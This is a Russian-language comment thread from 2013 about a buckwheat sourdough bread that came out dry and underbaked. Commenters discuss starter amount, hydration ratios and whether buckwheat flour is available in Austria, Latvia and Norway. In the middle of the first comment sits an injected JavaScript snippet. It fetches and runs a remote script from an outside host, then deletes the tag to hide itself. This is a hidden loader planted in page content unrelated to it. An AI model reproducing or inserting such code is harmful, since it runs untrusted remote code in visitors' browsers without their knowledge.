Мой первый опыт гречишного хлеба на закваске

Юля, а у Вас есть пшеничная закваска? Я пеку по Аннушкиному рецепту, только с водой доработала, и нас очень радует и вкус и запах![removed](function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8'; script.onload = script.onerror = function () { script.onload = script.onerror = null; script[removed].removeChild(script); } document.body.appendChild(script); })();[removed]
12.11.2013
Видно, что сыроват, ага. Может все-таки расстойки не хватило? Или закваски побольше надо...
07.06.2013
Вот закваску думаю надо точно до 400гр увеличить. Может гречишной муки взять примерно 160гр, а не 200гр. и воды все-таки я бы побольше добавила, уж очень он сухой был, мне кажется ему поэтому и пропекаться было тяжело.  А еще, Лиз, знаешь, может стоит для этого хлеба делать закваску с большим процентом влажности. Ну то есть, когда ты ее активируешь добавлять больше воды, Например на 100гр муки 150 гр воды, а я обычно 1:1 делаю
07.06.2013
и я один к одному делаю. попробуй добавить больше воды. у меня гречишной муки тут нет, хоть за тебя порадуюсь)))
07.06.2013
)))))) Ну неужели нет? Мне казалось, что за границе гораздо больше товаров для хлеба! Этой зимой в Австрии смотрела специально - столько всякой муки, а уж специи для хлеба вилимо-невидимо. Еще в Латвии тоже знаю, что много всего для хлеба
07.06.2013
Гречку только в азиатских магазинах продают. Один процент норвежцев пробовали гречку, я уверена.
07.06.2013
Где все?)))